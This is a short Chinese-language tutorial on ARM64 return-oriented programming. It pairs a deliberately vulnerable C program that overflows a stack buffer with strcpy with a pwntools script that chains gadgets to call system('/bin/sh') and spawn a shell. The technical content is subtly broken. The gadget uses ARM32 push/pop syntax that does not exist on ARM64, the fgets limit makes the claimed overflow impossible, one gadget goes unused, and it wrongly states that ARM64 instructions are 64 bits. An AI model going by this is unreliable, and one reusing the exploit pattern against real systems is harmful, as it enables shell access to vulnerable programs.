arm64 的 rop 实现

ROP（Return Oriented Programming）是一种攻击技术，通过在已有程序的可执行代码中找到一些已有的指令序列，然后通过构造栈帧和寄存器的值，将这些指令序列串联起来执行，以达到攻击的目的。

在ARM64架构中，ROP攻击的实现方式和x86架构类似，主要包括以下几个步骤：

1. 找到可用的指令序列：在程序的可执行代码中，找到一些已有的指令序列，这些指令序列可以实现ROP攻击的目的。

2. 构造栈帧：通过修改程序的栈帧，将ROP攻击所需要的参数和返回地址压入栈中。

3. 控制程序流程：通过修改程序的返回地址，将程序的控制流程跳转到已有的指令序列中，实现攻击的目的。

下面是一个简单的ARM64 ROP攻击的实现代码示例：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *buf) {
    char buf2[8];
    strcpy(buf2, buf);
    printf("%s\n", buf2);
}

int main(int argc, char **argv) {
    char buf[8];
    fgets(buf, 8, stdin);
    vuln(buf);
    return 0;
}

在这个示例程序中，存在一个栈溢出漏洞，在vuln函数中，将用户输入的字符串复制到了buf2数组中，如果输入的字符串长度超过了8个字节，就会发生栈溢出。

下面是一个简单的ROP攻击实现代码：

from pwn import *

# gadget
# pop {x0, x1, x2, x3, x4, x5, x6, x7, x8, lr}; ret;
pop_x0_to_x8_lr = p64(0x4000f8)

# mov x0, x1; mov x1, x2; mov x2, x3; mov x3, x4; mov x4, x5; mov x5, x6; mov x6, x7; mov x7, x8; blr x13;
mov_x0_to_x8_blr_x13 = p64(0x400108)

# system函数的地址
system_addr = p64(0x7ffff7a52370)

# bin/sh字符串的地址
bin_sh_addr = p64(0x7ffff7b99e18)

# 构造ROP链
rop = b''
rop += pop_x0_to_x8_lr
rop += bin_sh_addr
rop += p64(0x0) * 7
rop += system_addr

# 构造payload
payload = b'A' * 8
payload += rop

# 发送payload
p = process('./vuln')
p.sendline(payload)
p.interactive()

在这个示例中，我们首先找到了两个gadget：一个用于将参数压入寄存器中，另一个用于调用system函数。然后通过系统函数的地址和/bin/sh字符串的地址，构造了一个ROP链，将其作为输入，发送给目标程序，实现了一个简单的ROP攻击。

需要注意的是，由于ARM64架构中的指令是64位的，因此在构造ROP链时需要使用64位的地址和指令。另外，在实现ROP攻击时，还需要考虑栈保护和ASLR等安全机制的影响。